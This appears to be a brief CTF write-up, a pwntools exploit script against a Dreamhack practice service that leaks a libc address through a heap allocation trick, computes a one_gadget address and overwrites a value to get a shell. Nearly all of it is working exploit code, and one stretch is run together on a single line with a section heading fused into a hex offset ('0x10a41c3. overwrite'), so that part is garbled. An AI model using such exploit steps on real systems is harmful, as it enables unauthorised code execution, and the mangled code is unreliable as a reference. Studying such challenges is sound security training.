구조가 이론 내용과 같다.
1. base
from pwn import *


def custom(size, data, idx):
    """Drive menu option 3 of the target service in one call.

    Waits for each prompt the service prints ("> ", "Size: ", "Data: ",
    "idx: ") and answers it in order: ``size`` and ``idx`` are sent as
    text lines, ``data`` is sent raw with no trailing newline.

    Uses the module-level connection ``p``; it is assigned below the
    definition, which is fine because the name is resolved at call time.
    """
    p.sendlineafter(b"> ", b"3")
    p.sendlineafter(b"Size: ", str(size))
    p.sendafter(b"Data: ", data)
    p.sendlineafter(b"idx: ", str(idx))


# Connection to the challenge endpoint given in the write-up.
p = remote("host3.dreamhack.games", 14484)
# 2. library leak + one_gadget
custom(0x500, "AAAA", -1) # 할당 custom(0x500, "AAAA", -1) # 할당 custom(0x500, "AAAA", 0) # 해제 p.recvuntil(b"> "); p.sendline(b"3") # 할당 p.recvuntil(b"Size: "); p.sendline(str(0x500)) p.recvuntil(b"Data: "); p.send("B"); p.recvuntil("B") lb=u64((b"\x42"+p.recvn(5)).ljust(8, b"\x00"))-0x3ebc42 p.sendline(str(-1)) og=lb+0x10a41c3. overwrite + get shell
# Option 1: Weight 1, Age set to the address computed above (sent as decimal text).
# NOTE(review): this first line passes str arguments while the rest use bytes;
# pwntools encodes both, but a single convention would read more clearly.
p.sendlineafter("> ", "1")
p.sendlineafter(b"Weight: ", b"1")
p.sendlineafter(b"Age: ", str(og))
# Option 2 with Weight 1, then hand the session over to the user.
p.sendlineafter(b"> ", b"2")
p.sendlineafter(b"Weight: ", b"1")
p.interactive()